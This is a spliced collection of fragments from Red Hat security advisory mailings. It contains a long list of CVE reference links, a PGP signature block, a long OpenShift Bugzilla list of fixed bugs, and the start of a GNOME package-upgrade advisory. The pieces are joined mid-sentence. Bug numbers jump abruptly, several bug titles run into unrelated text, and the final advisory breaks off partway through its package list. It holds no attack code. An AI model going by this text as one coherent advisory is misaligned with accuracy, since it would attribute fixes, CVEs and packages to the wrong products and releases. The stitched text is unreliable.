https://access.redhat.com/security/cve/CVE-2019-12614
https://access.redhat.com/security/cve/CVE-2019-13050
https://access.redhat.com/security/cve/CVE-2019-13225
https://access.redhat.com/security/cve/CVE-2019-13627
https://access.redhat.com/security/cve/CVE-2019-14889
https://access.redhat.com/security/cve/CVE-2019-15165
https://access.redhat.com/security/cve/CVE-2019-15166
https://access.redhat.com/security/cve/CVE-2019-15903
https://access.redhat.com/security/cve/CVE-2019-15917
https://access.redhat.com/security/cve/CVE-2019-15925
https://access.redhat.com/security/cve/CVE-2019-16167
https://access.redhat.com/security/cve/CVE-2019-16168
https://access.redhat.com/security/cve/CVE-2019-16231
https://access.redhat.com/security/cve/CVE-2019-16233
https://access.redhat.com/security/cve/CVE-2019-16935
https://access.redhat.com/security/cve/CVE-2019-17450
https://access.redhat.com/security/cve/CVE-2019-17546
https://access.redhat.com/security/cve/CVE-2019-18197
https://access.redhat.com/security/cve/CVE-2019-18808
https://access.redhat.com/security/cve/CVE-2019-18809
https://access.redhat.com/security/cve/CVE-2019-19046
https://access.redhat.com/security/cve/CVE-2019-19056
https://access.redhat.com/security/cve/CVE-2019-19062
https://access.redhat.com/security/cve/CVE-2019-19063
https://access.redhat.com/security/cve/CVE-2019-19068
https://access.redhat.com/security/cve/CVE-2019-19072
https://access.redhat.com/security/cve/CVE-2019-19221
https://access.redhat.com/security/cve/CVE-2019-19319
https://access.redhat.com/security/cve/CVE-2019-19332
https://access.redhat.com/security/cve/CVE-2019-19447
https://access.redhat.com/security/cve/CVE-2019-19524
https://access.redhat.com/security/cve/CVE-2019-19533
https://access.redhat.com/security/cve/CVE-2019-19537
https://access.redhat.com/security/cve/CVE-2019-19543
https://access.redhat.com/security/cve/CVE-2019-19602
https://access.redhat.com/security/cve/CVE-2019-19767
https://access.redhat.com/security/cve/CVE-2019-19770
https://access.redhat.com/security/cve/CVE-2019-19906
https://access.redhat.com/security/cve/CVE-2019-19956
https://access.redhat.com/security/cve/CVE-2019-20054
https://access.redhat.com/security/cve/CVE-2019-20218
https://access.redhat.com/security/cve/CVE-2019-20386
https://access.redhat.com/security/cve/CVE-2019-20387
https://access.redhat.com/security/cve/CVE-2019-20388
https://access.redhat.com/security/cve/CVE-2019-20454
https://access.redhat.com/security/cve/CVE-2019-20636
https://access.redhat.com/security/cve/CVE-2019-20807
https://access.redhat.com/security/cve/CVE-2019-20812
https://access.redhat.com/security/cve/CVE-2019-20907
https://access.redhat.com/security/cve/CVE-2019-20916
https://access.redhat.com/security/cve/CVE-2020-0305
https://access.redhat.com/security/cve/CVE-2020-0444
https://access.redhat.com/security/cve/CVE-2020-1716
https://access.redhat.com/security/cve/CVE-2020-1730
https://access.redhat.com/security/cve/CVE-2020-1751
https://access.redhat.com/security/cve/CVE-2020-1752
https://access.redhat.com/security/cve/CVE-2020-1971
https://access.redhat.com/security/cve/CVE-2020-2574
https://access.redhat.com/security/cve/CVE-2020-2752
https://access.redhat.com/security/cve/CVE-2020-2922
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3898
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-6405
https://access.redhat.com/security/cve/CVE-2020-7595
https://access.redhat.com/security/cve/CVE-2020-7774
https://access.redhat.com/security/cve/CVE-2020-8177
https://access.redhat.com/security/cve/CVE-2020-8492
https://access.redhat.com/security/cve/CVE-2020-8563
https://access.redhat.com/security/cve/CVE-2020-8566
https://access.redhat.com/security/cve/CVE-2020-8619
https://access.redhat.com/security/cve/CVE-2020-8622
https://access.redhat.com/security/cve/CVE-2020-8623
https://access.redhat.com/security/cve/CVE-2020-8624
https://access.redhat.com/security/cve/CVE-2020-8647
https://access.redhat.com/security/cve/CVE-2020-8648
https://access.redhat.com/security/cve/CVE-2020-8649
https://access.redhat.com/security/cve/CVE-2020-9327
https://access.redhat.com/security/cve/CVE-2020-9802
https://access.redhat.com/security/cve/CVE-2020-9803
https://access.redhat.com/security/cve/CVE-2020-9805
https://access.redhat.com/security/cve/CVE-2020-9806
https://access.redhat.com/security/cve/CVE-2020-9807
https://access.redhat.com/security/cve/CVE-2020-9843
https://access.redhat.com/security/cve/CVE-2020-9850
https://access.redhat.com/security/cve/CVE-2020-9862
https://access.redhat.com/security/cve/CVE-2020-9893
https://access.redhat.com/security/cve/CVE-2020-9894
https://access.redhat.com/security/cve/CVE-2020-9895
https://access.redhat.com/security/cve/CVE-2020-9915
https://access.redhat.com/security/cve/CVE-2020-9925
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-10029
https://access.redhat.com/security/cve/CVE-2020-10732
https://access.redhat.com/security/cve/CVE-2020-10749
https://access.redhat.com/security/cve/CVE-2020-10751
https://access.redhat.com/security/cve/CVE-2020-10763
https://access.redhat.com/security/cve/CVE-2020-10773
https://access.redhat.com/security/cve/CVE-2020-10774
https://access.redhat.com/security/cve/CVE-2020-10942
https://access.redhat.com/security/cve/CVE-2020-11565
https://access.redhat.com/security/cve/CVE-2020-11668
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/cve/CVE-2020-12465
https://access.redhat.com/security/cve/CVE-2020-12655
https://access.redhat.com/security/cve/CVE-2020-12659
https://access.redhat.com/security/cve/CVE-2020-12770
https://access.redhat.com/security/cve/CVE-2020-12826
https://access.redhat.com/security/cve/CVE-2020-13249
https://access.redhat.com/security/cve/CVE-2020-13630
https://access.redhat.com/security/cve/CVE-2020-13631
https://access.redhat.com/security/cve/CVE-2020-13632
https://access.redhat.com/security/cve/CVE-2020-14019
https://access.redhat.com/security/cve/CVE-2020-14040
https://access.redhat.com/security/cve/CVE-2020-14381
https://access.redhat.com/security/cve/CVE-2020-14382
https://access.redhat.com/security/cve/CVE-2020-14391
https://access.redhat.com/security/cve/CVE-2020-14422
https://access.redhat.com/security/cve/CVE-2020-15157
https://access.redhat.com/security/cve/CVE-2020-15503
https://access.redhat.com/security/cve/CVE-2020-15862
https://access.redhat.com/security/cve/CVE-2020-15999
https://access.redhat.com/security/cve/CVE-2020-16166
https://access.redhat.com/security/cve/CVE-2020-24490
https://access.redhat.com/security/cve/CVE-2020-24659
https://access.redhat.com/security/cve/CVE-2020-25211
https://access.redhat.com/security/cve/CVE-2020-25641
https://access.redhat.com/security/cve/CVE-2020-25658
https://access.redhat.com/security/cve/CVE-2020-25661
https://access.redhat.com/security/cve/CVE-2020-25662
https://access.redhat.com/security/cve/CVE-2020-25681
https://access.redhat.com/security/cve/CVE-2020-25682
https://access.redhat.com/security/cve/CVE-2020-25683
https://access.redhat.com/security/cve/CVE-2020-25684
https://access.redhat.com/security/cve/CVE-2020-25685
https://access.redhat.com/security/cve/CVE-2020-25686
https://access.redhat.com/security/cve/CVE-2020-25687
https://access.redhat.com/security/cve/CVE-2020-25694
https://access.redhat.com/security/cve/CVE-2020-25696
https://access.redhat.com/security/cve/CVE-2020-26160
https://access.redhat.com/security/cve/CVE-2020-27813
https://access.redhat.com/security/cve/CVE-2020-27846
https://access.redhat.com/security/cve/CVE-2020-28362
https://access.redhat.com/security/cve/CVE-2020-29652
https://access.redhat.com/security/cve/CVE-2021-2007
https://access.redhat.com/security/cve/CVE-2021-3121
https://access.redhat.com/security/updates/classification/#moderate
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYDZ+bNzjgjWX9erEAQghXg//awGwjQxJ5LEZWBTdgyuCa8mHEi2rop5T
lmebolBMNRSbo9gI8LMSHlvIBBFiV4CuFvfxE0AVLNentfzOTH11TxNWe1KQYt4H
EmcGHPeHWTxKDkvAHtVcWXy9WN3y5d4lHSaq6AR1nHRPcj/k1upyx22kotpnYxN8
4d49PjFTO3YbmdYpNLVJ9nY8izqUpTfM7YSyj6ANZSlaYc5Z215o6TPo6e3wobf4
mWu+VfDS0v+/AbGhQhO2sQ7r2ysJ85MB7c62cxck4a51KiA0NKd4xr0TAA4KHnNL
ISHFzi5QYXu+meE+9wYRo1ZjJ5fbPj41+1TJbR6O4CbP0xQiFpcUSipNju3rGSGy
Ae5G/QGT8J7HzOjlKVvY3SFu/odENR6c+xUIr7IB/FBlu7DdPF2XxMZDQD4DKHEk
4aiDbuiEL3Yf78Ic1RqPPmrj9plIwprVFQz+k3JaQXKD+1dBxO6tk+nVu2/5xNbM
uR03hrthYYIpdXLSWU4lzq8j3kQ9wZ4j/m2o6/K6eHNl9PyqAG5jfQv9bVf8E3oG
krzc/JLvOfHNEQ/oJs/v/DFDmnAxshCCtGWlpLJ5J0pcD3EePsrPNs1QtQurVrMv
RjfBCWKOij53+BinrMKHdsHxfur7GCFCIQCVaLIv6GUjX2NWI0voIVA8JkrFNNp6
McvuEaxco7U=
=sw8i
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. Bugs fixed (https://bugzilla.redhat.com/):
1808240 - Always return metrics value for pods under the user's namespace
1815189 - feature flagged UI does not always become available after operator installation
1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters
1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly
1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal
1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered
1878925 - 'oc adm upgrade --to ...' rejects versions which occur only in history, while the cluster-version operator supports history fallback
1880738 - origin e2e test deletes original worker
1882983 - oVirt csi driver should refuse to provision RWX and ROX PV
1886450 - Keepalived router id check not documented for RHV/VMware IPI
1889488 - The metrics endpoint for the Scheduler is not protected by RBAC
1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom
1896474 - Path based routing is broken for some combinations
1897431 - CIDR support for additional network attachment with the bridge CNI plug-in
1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes
1907433 - Excessive logging in image operator
1909906 - The router fails with PANIC error when stats port already in use
1911173 - [MSTR-998] Many charts' legend names show {{}} instead of words
1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting.
1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)
1917893 - [ovirt] install fails: due to terraform error "Cannot attach Virtual Disk: Disk is locked" on vm resource
1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1926522 - oc adm catalog does not clean temporary files
1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes.
1928141 - kube-storage-version-migrator constantly reporting type "Upgradeable" status Unknown
1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it's storageclass is not yet finished, confusing users
1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x
1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade
1937085 - RHV UPI inventory playbook missing guarantee_memory
1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion
1938236 - vsphere-problem-detector does not support overriding log levels via storage CR
1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods
1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer
1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]
1942913 - ThanosSidecarUnhealthy isn't resilient to WAL replays.
1943363 - [ovn] CNO should gracefully terminate ovn-northd
1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17
1948080 - authentication should not set Available=False APIServices_Error with 503s
1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set
1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0
1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer
1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs
1953264 - "remote error: tls: bad certificate" logs in prometheus-operator container
1955300 - Machine config operator reports unavailable for 23m during upgrade
1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set
1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set
1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters
1956496 - Needs SR-IOV Docs Upstream
1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret
1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid
1956964 - upload a boot-source to OpenShift virtualization using the console
1957547 - [RFE]VM name is not auto filled in dev console
1958349 - ovn-controller doesn't release the memory after cluster-density run
1959352 - [scale] failed to get pod annotation: timed out waiting for annotations
1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not
1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]
1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects
1961391 - String updates
1961509 - DHCP daemon pod should have CPU and memory requests set but not limits
1962066 - Edit machine/machineset specs not working
1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent
1963053 - `oc whoami --show-console` should show the web console URL, not the server api URL
1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1964327 - Support containers with name:tag@digest
1964789 - Send keys and disconnect does not work for VNC console
1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7
1966445 - Unmasking a service doesn't work if it masked using MCO
1966477 - Use GA version in KAS/OAS/OauthAS to avoid: "audit.k8s.io/v1beta1" is deprecated and will be removed in a future release, use "audit.k8s.io/v1" instead
1966521 - kube-proxy's userspace implementation consumes excessive CPU
1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up
1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount
1970218 - MCO writes incorrect file contents if compression field is specified
1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]
1970805 - Cannot create build when docker image url contains dir structure
1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io
1972827 - image registry does not remain available during upgrade
1972962 - Should set the minimum value for the `--max-icsp-size` flag of `oc adm catalog mirror`
1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run
1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established
1976301 - [ci] e2e-azure-upi is permafailing
1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change.
2007379 - Events are not generated for master offset for ordinary clock
2007443 - [ICNI 2.0] Loadbalancer pods do not establish BFD sessions with all workers that host pods for the routed namespace
2007455 - cluster-etcd-operator: render command should fail if machineCidr contains reserved address
2007495 - Large label value for the metric kubelet_started_pods_errors_total with label message when there is a error
2007522 - No new local-storage-operator-metadata-container is build for 4.10
2007551 - No new ose-aws-efs-csi-driver-operator-bundle-container is build for 4.10
2007580 - Azure cilium installs are failing e2e tests
2007581 - Too many haproxy processes in default-router pod causing high load average after upgrade from v4.8.3 to v4.8.10
2007677 - Regression: core container io performance metrics are missing for pod, qos, and system slices on nodes
2007692 - 4.9 "old-rhcos" jobs are permafailing with storage test failures
2007710 - ci/prow/e2e-agnostic-cmd job is failing on prow
2007757 - must-gather extracts imagestreams in the "openshift" namespace, but not Templates
2007802 - AWS machine actuator get stuck if machine is completely missing
2008096 - TestAWSFinalizerDeleteS3Bucket sometimes fails to teardown operator
2008119 - The serviceAccountIssuer field on Authentication CR is reseted to “” when installation process
2008151 - Topology breaks on clicking in empty state
2008185 - Console operator go.mod should use go 1.16.version
2008201 - openstack-az job is failing on haproxy idle test
2008207 - vsphere CSI driver doesn't set resource limits
2008223 - gather_audit_logs: fix oc command line to get the current audit profile
2008235 - The Save button in the Edit DC form remains disabled
2008256 - Update Internationalization README with scope info
2008321 - Add correct documentation link for MON_DISK_LOW
2008462 - Disable PodSecurity feature gate for 4.10
2008490 - Backing store details page does not contain all the kebab actions.
2010181 - Environment variables not getting reset on reload on deployment edit form
2010310 - [sig-instrumentation][Late] OpenShift alerting rules should have description and summary annotations [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2010341 - OpenShift Alerting Rules Style-Guide Compliance
2010342 - Local console builds can have out of memory errors
2010345 - OpenShift Alerting Rules Style-Guide Compliance
2010348 - Reverts PIE build mode for K8S components
2010352 - OpenShift Alerting Rules Style-Guide Compliance
2010354 - OpenShift Alerting Rules Style-Guide Compliance
2010359 - OpenShift Alerting Rules Style-Guide Compliance
2010368 - OpenShift Alerting Rules Style-Guide Compliance
2010376 - OpenShift Alerting Rules Style-Guide Compliance
2010662 - Cluster is unhealthy after image-registry-operator tests
2010663 - OpenShift Alerting Rules Style-Guide Compliance (ovn-kubernetes subcomponent)
2010665 - Bootkube tries to use oc after cluster bootstrap is done and there is no API
2010698 - [BM] [IPI] [Dual Stack] Installer must ensure ipv6 short forms too if clusterprovisioning IP is specified as ipv6 address
2010719 - etcdHighNumberOfFailedGRPCRequests runbook is missing
2010864 - Failure building EFS operator
2010910 - ptp worker events unable to identify interface for multiple interfaces
2010911 - RenderOperatingSystem() returns wrong OS version on OCP 4.7.24
2010921 - Azure Stack Hub does not handle additionalTrustBundle
2010931 - SRO CSV uses non default category "Drivers and plugins"
2010946 - concurrent CRD from ovirt-csi-driver-operator gets reconciled by CVO after deployment, changing CR as well.
2011038 - optional operator conditions are confusing
2011063 - CVE-2021-39226 grafana: Snapshot authentication bypass
2011171 - diskmaker-manager constantly redeployed by LSO when creating LV's
2011293 - Build pod are not pulling images if we are not explicitly giving the registry name with the image
2011368 - Tooltip in pipeline visualization shows misleading data
2011386 - [sig-arch] Check if alerts are firing during or after upgrade success --- alert KubePodNotReady fired for 60 seconds with labels
2011411 - Managed Service's Cluster overview page contains link to missing Storage dashboards
2011443 - Cypress tests assuming Admin Perspective could fail on shared/reference cluster
2011513 - Kubelet rejects pods that use resources that should be freed by completed pods
2011668 - Machine stuck in deleting phase in VMware "reconciler failed to Delete machine"
2011693 - (release-4.10) "insightsclient_request_recvreport_total" metric is always incremented
2011698 - After upgrading cluster to 4.8 the kube-state-metrics service doesn't export namespace labels anymore
2011733 - Repository README points to broken documentarion link
2011753 - Ironic resumes clean before raid configuration job is actually completed
2011809 - The nodes page in the openshift console doesn't work. You just get a blank page
2011822 - Obfuscation doesn't work at clusters with OVN
2011882 - SRO helm charts not synced with templates
2011893 - Validation: BMC driver ipmi is not supported for secure UEFI boot
2011896 - [4.10] ClusterVersion Upgradeable=False MultipleReasons should include all messages
2011903 - vsphere-problem-detector: session leak
2011927 - OLM should allow users to specify a proxy for GRPC connections
2011956 - [tracker] Kubelet rejects pods that use resources that should be freed by completed pods
2011960 - [tracker] Storage operator is not available after reboot cluster instances
2011971 - ICNI2 pods are stuck in ContainerCreating state
2011972 - Ingress operator not creating wildcard route for hypershift clusters
2011977 - SRO bundle references non-existent image
2012069 - Refactoring Status controller
2012177 - [OCP 4.9 + OCS 4.8.3] Overview tab is missing under Storage after successful deployment on UI
2012228 - ibmcloud: credentialsrequests invalid for machine-api-operator: resource-group
2012233 - [IBMCLOUD] IPI: "Exceeded limit of remote rules per security group (the limit is 5 remote rules per security group)"
2012235 - [IBMCLOUD] IPI: IBM cloud provider requires ResourceGroupName in cloudproviderconfig
2012317 - Dynamic Plugins: ListPageCreateDropdown items cut off
2012407 - [e2e][automation] improve vm tab console tests
2012426 - ThanosSidecarBucketOperationsFailed/ThanosSidecarUnhealthy alerts don't have namespace label
2012562 - migration condition is not detected in list view
2012770 - when using expression metric openshift_apps_deploymentconfigs_last_failed_rollout_time namespace label is re-written
2012780 - The port 50936 used by haproxy is occupied by kube-apiserver
2012838 - Setting the default maximum container root partition size for Overlay with CRI-O stop working
2012902 - Neutron Ports assigned to Completed Pods are not reused Edit
2012915 - kube_persistentvolumeclaim_labels and kube_persistentvolume_labels are missing in OCP 4.8 monitoring stack
2012971 - Disable operands deletes
2013034 - Cannot install to openshift-nmstate namespace
2013127 - OperatorHub links could not be opened in a new tabs (sharing and open a deep link works fine)
2013199 - post reboot of node SRIOV policy taking huge time
2013203 - UI breaks when trying to create block pool before storage cluster/system creation
2013222 - Full breakage for nightly payload promotion
2013273 - Nil pointer exception when phc2sys options are missing
2013321 - TuneD: high CPU utilization of the TuneD daemon.
2013416 - Multiple assets emit different content to the same filename
2013431 - Application selector dropdown has incorrect font-size and positioning
2013528 - mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2013545 - Service binding created outside topology is not visible
2013599 - Scorecard support storage is not included in ocp4.9
2013632 - Correction/Changes in Quick Start Guides for ODF 4.9 (Install ODF guide)
2013646 - fsync controller will show false positive if gaps in metrics are observed. to user and tries to just load a blank screen on 'Add Capacity' button click
2015506 - Home - Search - Resources - APIRequestCount : hard to select an item from ellipsis menu
2015515 - Kubelet checks all providers even if one is configured: NoCredentialProviders: no valid providers in chain.
2015535 - Administration - ResourceQuotas - ResourceQuota details: Inside Pie chart 'x% used' is in English
2015549 - Observe - Metrics: Column heading and pagination text is in English
2015557 - Workloads - DeploymentConfigs : Error message is in English
2015568 - Compute - Nodes : CPU column's values are in English
2015635 - Storage operator fails causing installation to fail on ASH
2015660 - "Finishing boot source customization" screen should not use term "patched"
2015793 - [hypershift] The collect-profiles job's pods should run on the control-plane node
2015806 - Metrics view in Deployment reports "Forbidden" when not cluster-admin
2015819 - Conmon sandbox processes run on non-reserved CPUs with workload partitioning
2015837 - OS_CLOUD overwrites install-config's platform.openstack.cloud
2015950 - update from 4.7.22 to 4.8.11 is failing due to large amount of secrets to watch
2015952 - RH CodeReady Workspaces Operator in e2e testing will soon fail
2016004 - [RFE] RHCOS: help determining whether a user-provided image was already booted (Ignition provisioning already performed)
2016008 - [4.10] Bootimage bump tracker
2016052 - No e2e CI presubmit configured for release component azure-file-csi-driver
2016053 - No e2e CI presubmit configured for release component azure-file-csi-driver-operator
2016054 - No e2e CI presubmit configured for release component cluster-autoscaler
2016055 - No e2e CI presubmit configured for release component console
2016058 - openshift-sync does not synchronise in "ose-jenkins:v4.8"
2016064 - No e2e CI presubmit configured for release component ibm-cloud-controller-manager
2016065 - No e2e CI presubmit configured for release component ibmcloud-machine-controllers
2016175 - Pods get stuck in ContainerCreating state when attaching volumes fails on SNO clusters.
2016179 - Add Sprint 208 translations
2016228 - Collect Profiles pprof secret is hardcoded to openshift-operator-lifecycle-manager
2016235 - should update to 7.5.11 for grafana resources version label
2016296 - Openshift virtualization : Create Windows Server 2019 VM using template : Fails
2016334 - shiftstack: SRIOV nic reported as not supported
2016352 - Some pods start before CA resources are present
2016367 - Empty task box is getting created for a pipeline without finally task
2016435 - Duplicate AlertmanagerClusterFailedToSendAlerts alerts
2016438 - Feature flag gating is missing in few extensions contributed via knative plugin
2016442 - OCPonRHV: pvc should be in Bound state and without error when choosing default sc
2016446 - [OVN-Kubernetes] Egress Networkpolicy is failing Intermittently for statefulsets
2016453 - Complete i18n for GaugeChart defaults
2016479 - iface-id-ver is not getting updated for existing lsp
2016925 - Dashboards with All filter, change to a specific value and change back to All, data will disappear
2016951 - dynamic actions list is not disabling "open console" for stopped vms
2016955 - m5.large instance type for bootstrap node is hardcoded causing deployments to fail if instance type is not available
2016988 - NTO does not set io_timeout and max_retries for AWS Nitro instances
2017016 - [REF] Virtualization menu
2017036 - [sig-network-edge][Feature:Idling] Unidling should handle many TCP connections fails in periodic-ci-openshift-release-master-ci-4.9-e2e-openstack-ovn
2017050 - Dynamic Plugins: Shared modules loaded multiple times, breaking use of PatternFly
2017130 - t is not a function error navigating to details page
2017141 - Project dropdown has a dynamic inline width added which can cause min-width issue
2017244 - ovirt csi operator static files creation is in the wrong order
2017276 - [4.10] Volume mounts not created with the correct security context
2017327 - When run opm index prune failed with error removing operator package cic-operator FOREIGN KEY constraint failed.
2022447 - ServiceAccount in manifests conflicts with OLM
2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules.
2025821 - Make "Network Attachment Definitions" available to regular user
2025823 - The console nav bar ignores plugin separator in existing sections
2025830 - CentOS capitalizaion is wrong
2025837 - Warn users that the RHEL URL expire
2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-*
2025903 - [UI] RoleBindings tab doesn't show correct rolebindings
2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2026178 - OpenShift Alerting Rules Style-Guide Compliance
2026209 - Updation of task is getting failed (tekton hub integration)
2026223 - Internal error occurred: failed calling webhook "ptpconfigvalidationwebhook.openshift.io"
2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates
2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct
2026352 - Kube-Scheduler revision-pruner fail during install of new cluster
2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment
2026383 - Error when rendering custom Grafana dashboard through ConfigMap
2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation
2026396 - Cachito Issues: sriov-network-operator Image build failure
2026488 - openshift-controller-manager - delete event is repeating pathologically
2026489 - ThanosRuleRuleEvaluationLatencyHigh alerts when a big quantity of alerts defined.
2039359 - `oc adm prune deployments` can't prune the RS where the associated Deployment no longer exists
2039382 - gather_metallb_logs does not have execution permission
2039406 - logout from rest session after vsphere operator sync is finished
2039408 - Add GCP region northamerica-northeast2 to allowed regions
2039414 - Cannot see the weights increased for NodeAffinity, InterPodAffinity, TaintandToleration
2039425 - No need to set KlusterletAddonConfig CR applicationManager->enabled: true in RAN ztp deployment
2039491 - oc - git:// protocol used in unit tests
2039516 - Bump OVN to ovn21.12-21.12.0-25
2039529 - Project Dashboard Resource Quotas Card empty state test flaking at a high rate
2039534 - Diagnose and fix Project Dashboard Resource Quotas Card test that was previously disabled
2039541 - Resolv-prepender script duplicating entries
2039586 - [e2e] update centos8 to centos stream8
2039618 - VM created from SAP HANA template leads to 404 page if leave one network parameter empty
2039619 - [AWS] In tree provisioner storageclass aws disk type should contain 'gp3' and csi provisioner storageclass default aws disk type should be 'gp3'
2039670 - Create PDBs for control plane components
2039678 - Page goes blank when create image pull secret
2039689 - [IPI on Alibabacloud] Pay-by-specification NAT is no longer supported
2039743 - React missing key warning when open operator hub detail page (and maybe others as well)
2039756 - React missing key warning when open KnativeServing details
2039770 - Observe dashboard doesn't react on time-range changes after browser reload when perspective is changed in another tab
2039776 - Observe dashboard shows nothing if the URL links to an non existing dashboard
2039781 - [GSS] OBC is not visible by admin of a Project on Console
2039798 - Contextual binding with Operator backed service creates visual connector instead of Service binding connector
2039868 - Insights Advisor widget is not in the disabled state when the Insights Operator is disabled
2039880 - Log level too low for control plane metrics
2039919 - Add E2E test for router compression feature
2039981 - ZTP for standard clusters installs stalld on master nodes
2040132 - Flag --port has been deprecated, This flag has no effect now and will be removed in v1.24.
2043117 - Recommended operators links are erroneously treated as external
2043130 - Update CSI sidecars to the latest release for 4.10
2043234 - Missing validation when creating several BGPPeers with the same peerAddress
2043240 - Sync openshift/descheduler with sigs.k8s.io/descheduler
2043254 - crio does not bind the security profiles directory
2043296 - Ignition fails when reusing existing statically-keyed LUKS volume
2043297 - [4.10] Bootimage bump tracker
2043316 - RHCOS VM fails to boot on Nutanix AOS
2043446 - Rebase aws-efs-utils to the latest upstream version.
2043556 - Add proper ci-operator configuration to ironic and ironic-agent images
2043577 - DPU network operator
2043651 - Fix bug with exp. backoff working correcly when setting nextCheck in vsphere operator
2043675 - Too many machines deleted by cluster autoscaler when scaling down
2043683 - Revert bug 2039344 Ignoring IPv6 addresses against etcd cert validation
2043709 - Logging flags no longer being bound to command line
2043721 - Installer bootstrap hosts using outdated kubelet containing bugs
2043731 - [IBMCloud] terraform outputs missing for ibmcloud bootstrap and worker ips for must-gather
2043759 - Bump cluster-ingress-operator to k8s.io/api 1.23
2043780 - Bump router to k8s.io/api 1.23
2043787 - Bump cluster-dns-operator to k8s.io/api 1.23
2043801 - Bump CoreDNS to k8s.io/api 1.23
2043802 - EgressIP stopped working after single egressIP for a netnamespace is switched to the other node of HA pair after the first egress node is shutdown
2043961 - [OVN-K] If pod creation fails, retry doesn't work as expected.
2052458 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052598 - kube-scheduler should use configmap lease
2052599 - kube-controller-manger should use configmap lease
2052600 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052609 - [vSphere CSI driver Operator] RWX volumes counts metrics `vsphere_rwx_volumes_total` not valid
2052611 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2052612 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set. Relevant releases/architectures:
Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
GNOME is the default desktop environment of Red Hat Enterprise Linux.
The following packages have been upgraded to a later upstream version:
gnome-remote-desktop (0.1.8), pipewire (0.3.6), vte291 (0.52.4),
